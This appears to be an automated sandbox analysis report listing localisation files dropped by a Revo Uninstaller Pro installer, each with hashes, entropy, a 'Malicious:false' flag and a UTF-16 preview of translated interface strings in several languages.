                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (659), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):126512
                                                                                                                                            Entropy (8bit):3.720605069842754
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:150RW5EH5DMXV53O2d/H+gzbtey7fvDMKd5Jpf+l9yNqaWcOIcHeG:150RW5AqXV53O2d/Hf1vDHv0ecv
                                                                                                                                            MD5:A1E4DAB88269A98C1EE4F4959E36A157
                                                                                                                                            SHA1:25F2491DE087F9C6F7D1B84E245658C19C167C91
                                                                                                                                            SHA-256:2C6EF86AF703BF0721025E58922BE5A780EC0AAC08DD479A88D467A87904D87C
                                                                                                                                            SHA-512:468508A84F689FF808A9B99BF9265D1F04FCDAEBFE798803023ED70E550835761C5A505F0BF66E78B578EA51FDECF2D2CDB4E5EAD7D7309EA3D4B01220572305
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.C.z.e.c.h.....W.e.b.L.a.n.g.=.c.z.....T.r.a.n.s.l.a.t.o.r.=.T.Y.a.s...k. .J.i.Y.......C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...2...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .Z.o.b.r.a.z.i.t.....1.0.3. .=. .N.a.s.t.a.v.e.n.......1.0.4. .=. .O.d.i.n.s.t.a.l...t.o.r.....1.0.5. .=. .N...s.t.r.o.j.e.....1.0.6. .=. .R.e.~.i.m. .l.o.v.c.e.....1.0.7. .=. .S.e.z.n.a.m.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .D.e.t.a.i.l.y.....1.1.0. .=. .O.d.i.n.s.t.a.l.o.v.a.t.....1.1.1. .=. .O.d.e.b.r.a.t. .p.o.l.o.~.k.u.....1.1.2. .=. .O.b.n.o.v.i.t.....1.1.3. .=. .O.p.r.a.v.d.u. .c.h.c.e.t.e. .o.d.e.b.r.a.t. .v.y.b.r.a.n.o.u. .p.o.l.o.~.k.u.?.....1.1.4. .=. .O.p.r.a.v.d.u. .c.h.c.e.t.e. .o.d.i.n.s.t.a.l.o.v.a.t. .v.y.b.r.a.n... .p.r.o.g.r.a.m.?.....1.1.5. .=. .A.u.t.o.a.k.t.u.a.l.i.z.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):97176
                                                                                                                                            Entropy (8bit):3.499969901388738
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:woFhvFocuFdycapmrOS9osFVrbmlEAicBDPGy0fr:hvFoc6dycaptSW0VrqlEAicBD+y+
                                                                                                                                            MD5:2B6C3675752D595B68E3E1C0A5992435
                                                                                                                                            SHA1:790F9E5297743509F2F5ACB575886935BB768EF4
                                                                                                                                            SHA-256:FA6449751FB82B79A1E4F071E5C20CF0DE86D015EDA9F0ABA347937A7F1394A2
                                                                                                                                            SHA-512:7F5DE4C53D39E69CBD69F27211BCA76FF7ADEB52BFFB4662136ACE6291B792D417FC9C4DEA67C1BD807788D03E427151B912E1A380D770FDEC50451D770D6BBE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .D.a.n.s.k./.D.a.n.i.s.h.....W.e.b.L.a.n.g.=.D.A.N.....T.r.a.n.s.l.a.t.o.r.=.R.e.g.m.o.s.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...5...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.....1.0.3. .=. .I.n.d.s.t.i.l.l.i.n.g.e.r.....1.0.4. .=. .A.f.i.n.s.t.a.l.l.e.r.i.n.g.....1.0.5. .=. .V...r.k.t...j.....1.0.6. .=. .J.a.g.t.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.f.i.n.s.t.a.l.l...r.....1.1.1. .=. .F.j.e.r.n. .e.m.n.e.....1.1.2. .=. .O.p.d.a.t...r.....1.1.3. .=. .V.i.l. .d.u. .f.j.e.r.n.e. .d.e.t. .v.a.l.g.t.e. .e.m.n.e.?.....1.1.4. .=. .V.i.l. .d.u. .a.f.i.n.s.t.a.l.l.e.r.e. .d.e.t. .v.a.l.g.t.e. .p.r.o.g.r.a.m.?.....1.1.5. .=. .O.p.d.a.t.e.r.i.n.g.....1.1.6. .=. .H.j...l.p.....1.1.7. .=. .H.j...
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (788), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):136212
                                                                                                                                            Entropy (8bit):3.4484649128879137
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:YusdiMXLgWkkKnB9jGm9ROVjB5ZegxC9WFh88ff0hUWaFZDeleeDK/4I4E4L03hA:mIyXxG
                                                                                                                                            MD5:170AF0E2F66875D305D9A1B5C054869B
                                                                                                                                            SHA1:AEB176BE7A44F890269EE45E79D5999138CD3EC6
                                                                                                                                            SHA-256:78386718921BC10E739CD96216F97C5F41308302A7F299B59AD76CABD8523E82
                                                                                                                                            SHA-512:9FBE996119EDA876C7613F759CF2BE7C86F02A9D7F382AF3F51F4CECE696C898620DFC6E9540C3541532AB0C9AC82B01297DFE1CD428E2F3AE667F0C9A7C9E59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .N.e.d.e.r.l.a.n.d.s./.D.u.t.c.h.....W.e.b.L.a.n.g.=.N.L.....T.r.a.n.s.l.a.t.o.r.=.J.a.n. .V.e.r.h.e.i.j.e.n.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .B.e.e.l.d.....1.0.3. .=. .O.p.t.i.e.s.....1.0.4. .=. .D.e.-.i.n.s.t.a.l.l.a.t.i.e.....1.0.5. .=. .H.u.l.p.p.r.o.g.r.a.m.m.a.'.s.....1.0.6. .=. .J.a.c.h.t.m.o.d.u.s.....1.0.7. .=. .L.i.j.s.t.....1.0.8. .=. .P.i.c.t.o.g.r.a.m.m.e.n.....1.0.9. .=. .D.e.t.a.i.l.s.....1.1.0. .=. .D.e.-.i.n.s.t.a.l.l.e.r.e.n.....1.1.1. .=. .I.t.e.m. .v.e.r.w.i.j.d.e.r.e.n.....1.1.2. .=. .V.e.r.n.i.e.u.w.e.n.....1.1.3. .=. .W.e.e.t. .u. .z.e.k.e.r. .d.a.t. .u. .d.i.t. .w.i.l.t. .v.e.r.w.i.j.d.e.r.e.n.?.....1.1.4. .=. .W.e.e.t. .u. .z.e.k.e.r. .d.a.t. .u. .h.e.t. .g.e.s.e.l.e.c.t.e.e.r.d.e. .p.r.o.g.r.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (667), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):126456
                                                                                                                                            Entropy (8bit):3.469932961281367
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2G/KyyIrUp+ihmoqVl4hF7bPwlBB9YK3zZ1lvQ:2GiybrVCmoqVlcFvyB0Kji
                                                                                                                                            MD5:17CBDCF3F67B750D9E2CFB18DA7999E7
                                                                                                                                            SHA1:493D989BEBAED68D57FDF72660E3664EA42FD669
                                                                                                                                            SHA-256:5663AF4869A89B1576748A914B63DB89A79FF8374A920D288445E2D600449DCD
                                                                                                                                            SHA-512:2407C09A6997C15FAAD8E49C8332504F6100EF0470192235E08DC3E7D525984E5D96D2A595C846CE2A43885BDB680E2DD84D42A0F086902C5BF1216A3CCBD202
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.n.g.l.i.s.h.....W.e.b.L.a.n.g.=.E.N.G.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.e.w.....1.0.3. .=. .O.p.t.i.o.n.s.....1.0.4. .=. .U.n.i.n.s.t.a.l.l.e.r.....1.0.5. .=. .T.o.o.l.s.....1.0.6. .=. .H.u.n.t.e.r. .M.o.d.e.....1.0.7. .=. .L.i.s.t.....1.0.8. .=. .I.c.o.n.s.....1.0.9. .=. .D.e.t.a.i.l.s.....1.1.0. .=. .U.n.i.n.s.t.a.l.l.....1.1.1. .=. .R.e.m.o.v.e. .E.n.t.r.y.....1.1.2. .=. .R.e.f.r.e.s.h.....1.1.3. .=. .A.r.e. .y.o.u. .s.u.r.e. .t.h.a.t. .y.o.u. .w.a.n.t. .t.o. .r.e.m.o.v.e. .t.h.e. .s.e.l.e.c.t.e.d. .e.n.t.r.y.?.....1.1.4. .=. .A.r.e. .y.o.u. .s.u.r.e. .y.o.u. .w.a.n.t. .t.o. .u.n.i.n.s.t.a.l.l. .t.h.e. .s.e.l.e.c.t.e.d. .p.r.o.g.r.a.m.?.....1.1.5.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (552), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):102574
                                                                                                                                            Entropy (8bit):3.4292555280223818
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:3BS3SpCVzylFGnh/QI2WCUHgG+d5d3cKE:3BS3SpCxuFGnh/uWCSgG+d5de
                                                                                                                                            MD5:A71E4B0F3A6135AEF662509B9745A3B9
                                                                                                                                            SHA1:B0199874CE7B88C391A17B27BBC44F5683B9DC8E
                                                                                                                                            SHA-256:A025E5A628208C16EA79694DD99AE311674BA66039E6D09E25F9E07972D0F055
                                                                                                                                            SHA-512:B542383514A9E341DFD2DAF4C8107D49CA98AFBB3D7BB81E9DCF03185BFE5C9935FCF9EEC90ED979C6DF734A60899BC249F2E1B7491A5966A3FB60DDC4EA3393
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.u.o.m.i./.F.i.n.n.i.s.h.....W.e.b.L.a.n.g.=.F.I.N.....T.r.a.n.s.l.a.t.o.r.=.O.l.l.i. .(.o.l.l.i.n.p.o.s.t.i.t.@.g.m.a.i.l...c.o.m.).....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...0...8.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .N...y.t.......1.0.3. .=. .A.s.e.t.u.k.s.e.t.....1.0.4. .=. .S.o.v.e.l.l.u.s.t.e.n. .p.o.i.s.t.o.....1.0.5. .=. .T.y...k.a.l.u.t.....1.0.6. .=. .O.s.o.i.t.u.s.t.o.i.m.i.n.t.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .K.u.v.a.k.k.e.e.t.....1.0.9. .=. .T.i.e.d.o.t.....1.1.0. .=. .P.o.i.s.t.a. .s.o.v.e.l.l.u.s.....1.1.1. .=. .P.o.i.s.t.a. .r.e.k.i.s.t.e.r.i.m.e.r.k.i.n.t.......1.1.2. .=. .P...i.v.i.t... .l.u.e.t.t.e.l.o.....1.1.3. .=. .O.l.e.t.k.o. .v.a.r.m.a.,. .e.t.t... .h.a.l.u.a.t. .p.o.i.s.t.a.a. .v.a.l.i.t.u.n. .r.e.k.i.s.t.e.r.i.m.e.r.k.i.n.n.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (642), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):152860
                                                                                                                                            Entropy (8bit):3.44749248104316
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:joijwidVJir5Wz8dm4V2s7EaYRbuSzNDCnPzA4Ke515hQFbtjkw9TSePDYNBU31L:2gLirEz8dmQ7EaYRTgnPm7Z
                                                                                                                                            MD5:3231DDD2F82B85DB1CD869787928DD93
                                                                                                                                            SHA1:AA17C84A1228555DC351571FB85E442F92C27478
                                                                                                                                            SHA-256:3873A122E6E00D421913C8C85D2112C85DFBB28ABB408CB44D6DC9B56CC74CB8
                                                                                                                                            SHA-512:4C477FAEA63D96ABF792338070CC753EA5FBBA21E23DEEE496E085D6F5478672EA3A38B7B6286303BE3D28234CF3F94BEAB9A64918A658365DE2626E861DB43B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .F.r.a.n...a.i.s./.F.r.e.n.c.h.....W.e.b.L.a.n.g.=.F.R.A.....T.r.a.n.s.l.a.t.o.r.=...m.i.l.e. .M.o.r.v.a.n.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .A.f.f.i.c.h.a.g.e.....1.0.3. .=. .O.p.t.i.o.n.s.....1.0.4. .=. .D...s.i.n.s.t.a.l.l.e.u.r.....1.0.5. .=. .A.u.t.r.e.s. .o.u.t.i.l.s.....1.0.6. .=. .M.o.d.e. .t.r.a.q.u.e.u.r.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.c...n.e.s.....1.0.9. .=. .D...t.a.i.l.l... .....1.1.0. .=. .D...s.i.n.s.t.a.l.l.e.r.....1.1.1. .=. .S.u.p.p.r.i.m.e.r. .l.'.e.n.t.r...e.....1.1.2. .=. .R.a.f.r.a...c.h.i.r.....1.1.3. .=. .V.o.u.l.e.z.-.v.o.u.s. .v.r.a.i.m.e.n.t. .s.u.p.p.r.i.m.e.r. .l.'.e.n.t.r...e. .s...l.e.c.t.i.o.n.n...e. .?.....1.1.4. .=. .V.o.u.l.e.z.-.v.o.u.s. .v.r.a.i.m.e.n.t. .d...s.i.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (551), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):150688
                                                                                                                                            Entropy (8bit):3.487331298408884
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:NzGb5p5B0vDcOQywq61+EgpHuOmZ1of41S7aDB5ag+Jkb3bQkzMjPjXg8iM3qQoU:yT0
                                                                                                                                            MD5:C333FD6BEDC812B8492B9068E3DFA7B5
                                                                                                                                            SHA1:322DDA605843896F8EA76997EC6274E44BF2C9F5
                                                                                                                                            SHA-256:6443FDA6F0A0FB4F99329962A1B09CAF3BF8568C74FC9D6EEBA1302A0C29300E
                                                                                                                                            SHA-512:7159FF7743DA3B3B62098FC2370E4AFD26980214EBD34C76F515BA553632DD5025B78C3389E53D064710C64A1B1BB2987055EFBC8C8256F10478F22BC375A15E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.D.e.u.t.s.c.h./.G.e.r.m.a.n.....W.e.b.L.a.n.g.=.G.E.R.....T.r.a.n.s.l.a.t.o.r.=.D.i.r.k. .P.a.u.l.s.e.n. ." .A.n.d.y. .K.l.e.i.n.e.r.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .A.n.s.i.c.h.t.....1.0.3. .=. .E.i.n.s.t.e.l.l.u.n.g.e.n. .(.A.l.t. ..' .O.).....1.0.4. .=. .D.e.i.n.s.t.a.l.l.i.e.r.e.n.....1.0.5. .=. .E.x.t.r.a.s.....1.0.6. .=. .J.a.g.d.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.n.a.n.s.i.c.h.t.....1.0.8. .=. .S.y.m.b.o.l.a.n.s.i.c.h.t.....1.0.9. .=. .D.e.t.a.i.l.a.n.s.i.c.h.t.....1.1.0. .=. .D.e.i.n.s.t.a.l.l.i.e.r.e.n.....1.1.1. .=. .E.l.e.m.e.n.t. .l...s.c.h.e.n.....1.1.2. .=. .A.k.t.u.a.l.i.s.i.e.r.e.n. .(.S.t.r.g. ..' .R.).....1.1.3. .=. .M...c.h.t.e.n. .S.i.e. .d.a.s. .a.u.s.g.e.w...h.l.t.e. .E.l.e.m.e.n.t.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (763), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):131466
                                                                                                                                            Entropy (8bit):4.065690087759101
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:rUVdwiSTdrABIXzfGCR3ZIaqF9/Yfzbu/TysGGaqZQ/NOjYF1aCiLGH:rUVdwiSTdrABIXzfGCR3ZIaqn/YfzbuC
                                                                                                                                            MD5:9A0D1063F791A4803AFB207E145FB7F5
                                                                                                                                            SHA1:4684E675834CB94ABD0A5AA4C7DEFABCF5B8CB9A
                                                                                                                                            SHA-256:0561BBFFC5347477DE4F28FB6C76F0DFEE254656125201DE0268392FBCE24368
                                                                                                                                            SHA-512:D662103D2716357942AD16C1386CA44D9E3BFEB289A6A4E2B8B586E851C29395A623BDE0AC35F090D04B7FE12632D68D427E2D6038CFE4D78DC321A09476E31E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .............../.G.u.j.a.r.a.t.i.....W.e.b.L.a.n.g.=.G.U.J.....T.r.a.n.s.l.a.t.o.r.=.K.u.m.a.r.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...........1.0.3. .=. ...................1.0.4. .=. ...........................1.0.5. .=. ...............1.0.6. .=. ............. ...........1.0.7. .=. .............1.0.8. .=. ...................1.0.9. .=. ...............1.1.0. .=. ..................... ...........1.1.1. .=. ............... ....... ...........1.1.2. .=. ............... ...........1.1.3. .=. ....... ....... ........... ......... ........... ................... ....... ......... ........... .....?.....1.1.4. .=. ....... ....... ........... ......... ........... ....................... ..................... .........
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (400), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):93828
                                                                                                                                            Entropy (8bit):4.066173134482651
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:H3oaEv+m7B5TZ5PNQzeoh2TwMRwBCDwUnMM8yArA4ad:Xoacmzhh2TwMRwADwUnn80d
                                                                                                                                            MD5:06007D50FFCC9ADCEFF96CF4439D033A
                                                                                                                                            SHA1:9C36E3C895694F30D1632B1EC0D571F5D8A2F2F9
                                                                                                                                            SHA-256:4C301B86818CA1D9134A8E416D347FF50EFF071E8377F69EB838FB42FF0ABAB3
                                                                                                                                            SHA-512:68B40EA6FE2FF9527D62E03B9A88583B2E4AE38F8FDC4016071CB47ED7CE2DB87411BD114566E840B946600123CC251C12C0C023528DBBAEFE4DFF26443860A6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.........../.H.e.b.r.e.w.....W.e.b.L.a.n.g.=.H.E.B.....T.r.a.n.s.l.a.t.o.r.=.Y.a.r.o.n...S. .-. .Y.a.r.o.n.'.S. .T.e.a.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...2...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...............1.0.3. .=. .....................1.0.4. .=. ......... ...................1.0.5. .=. .............1.0.6. .=. ."....... .".............1.0.7. .=. ...............1.0.8. .=. .....................1.0.9. .=. ...............1.1.0. .=. ...........1.1.1. .=. ....... ...........1.1.2. .=. .............1.1.3. .=.?. ....... ...../... ........./... ............... ........... ..... ......... ...............1.1.4. .=.?. ....... ...../... ........./... ............... ........... ..... ............. .................1.1.5. .=........... ...................1.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (789), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):137504
                                                                                                                                            Entropy (8bit):4.127665630312148
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:nH5z/5zzxtz9IraMTSvkNgcM1o2VTHbv5frC:H5XcmC
                                                                                                                                            MD5:323B3488D5BF1B952B83DC562E0A3FA2
                                                                                                                                            SHA1:8DB1AE77803019DB4503B878537C77DCA46391A4
                                                                                                                                            SHA-256:B798D3535F10CCCA8507D9FA0BB891470A8D8D5364013EAAF05D0224BC2247E8
                                                                                                                                            SHA-512:A66EDA53342213C7D475A0569B52CA8DF8C67949C75D6EA1CAA63420D5A1DBE4BBD2818F782257356DA474E2DF558AF8DE37BA9B2614EA831910855631ABB3CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=................./.G.r.e.e.k.(.H.e.l.l.e.n.i.c.).....W.e.b.L.a.n.g.=.G.R.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...1...0.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...................1.0.3. .=. .....................1.0.4. .=. .................................1.0.5. .=. .....................1.0.6. .=. ..................... .........................1.0.7. .=. .......................1.0.8. .=. .......................1.0.9. .=. .............................1.1.0. .=. ...............................1.1.1. .=. ................. ...........................1.1.2. .=. .....................1.1.3. .=. ........... ............... ....... ............. ..... ..................... ....... ..................... .................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (754), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):130882
                                                                                                                                            Entropy (8bit):4.087011727696048
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:UY/rr+qMUWBBZ/a/kHLM6/CgK8czSTMy/7:F/P+DUWx/06czSd/7
                                                                                                                                            MD5:271D39E6FF688E684A970F677FFA00B9
                                                                                                                                            SHA1:5A2415E31E5A7E4A5781603FF844406D48AE646A
                                                                                                                                            SHA-256:0B1BF07D976B9E20E2C97EE9D0C959842F885619F0282A5CAEBB882DF0075D47
                                                                                                                                            SHA-512:237D8C27172694F43678C79F211F11769C770E6FDE1FF9F239692B9F93FD78AF53F8D65109CCFBB111C32DA598DA67B94C78962D1A2C0A647F20B45459DAA46A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.9.?.(.M.&.@./.H.i.n.d.i.....W.e.b.L.a.n.g.=.H.I.N.....T.r.a.n.s.l.a.t.o.r.=.J...K.i.s.h.o.r.e. .R.e.d.d.y.,. .a.s.h.i.s.h. .s.h.a.r.m.a.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r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
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (600), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):93810
                                                                                                                                            Entropy (8bit):3.5478965253929156
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:loeLuV/aGAVazqJfWUEOINf9Fp2EitEEdQnv6cEeSvi2dIn1VponVP3rMDv:wVcXJfWUCFFpcxEv9Wvi2WDpua
                                                                                                                                            MD5:7D31DBE80F1759C28FFA258946FEC92F
                                                                                                                                            SHA1:A010F11A8C3A495F126F4C9FDB7317ABB1986A17
                                                                                                                                            SHA-256:9F69A409CADA6A835370E3A457EE83470F895B60755EE0807F27276C5738FD35
                                                                                                                                            SHA-512:542D1D5CBAA93BF9368B653D9D56E69860EAA698C33293223BFBFD474EECA7E1482D7E795DFBFB407D670913F87DB3E0A87351970CC0A0DB76DAB43CAC1199B9
                                                                                                                                            Malicious:false
